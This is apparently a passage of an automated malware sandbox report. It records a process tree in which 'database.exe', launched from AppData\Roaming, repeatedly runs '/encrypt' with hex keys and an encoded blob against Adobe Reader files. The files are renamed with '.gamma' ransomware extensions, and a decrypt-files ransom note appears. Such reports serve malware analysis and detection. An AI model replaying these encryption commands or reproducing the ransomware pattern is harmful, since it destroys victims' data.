                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\vdk150.dll"
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:3944
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.aup"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:6020
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\Gj4uETi2-5J83D24f.[[email protected]]"
                                                                                                                                                                                        5⤵
                                                                                                                                                                                          PID:5296
                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\#Decrypt_Files_ReadMe#.rtf"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:4172
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\k755tu4E-krPpNGe8.[[email protected]]"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:5164
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\QEhoto9u-15V0a8Mj.[[email protected]]"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:5732
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:1256
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:4708
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\README.TXT.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:4376
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:5812
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                        PID:2844
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:5828
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:4924
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\HLS.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                              PID:2248
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\IA32.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:1784
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:4648
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:5056
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:1664
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:4624
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\SaveAsRTF.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:6052
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search.api.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
